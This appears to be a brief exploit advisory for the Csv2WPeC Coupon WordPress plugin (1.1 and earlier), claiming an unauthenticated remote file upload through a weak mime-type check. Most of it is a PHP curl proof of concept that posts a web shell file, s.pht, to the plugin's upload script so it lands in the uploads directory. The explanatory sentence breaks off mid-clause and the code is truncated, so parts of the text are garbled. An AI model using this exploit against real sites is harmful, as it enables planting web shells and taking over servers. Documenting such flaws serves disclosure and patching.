Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload

The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for

PoC

“; $uploadfile=”/var/www/s.pht"; $ch = curl_init(“http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘UPLOAD_DIR’=>‘/usr/share/wordpress/wp-content/uploads/’,‘OP_TYPE’=>‘shell’,‘DATA_KEY’=>1,‘shell_file’=>“@$uploadfile”,‘folder’=>‘/usr/share/wordpress/wp-content/uploads/’,‘name’=>‘s.pht’)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print “$postResult”; ?>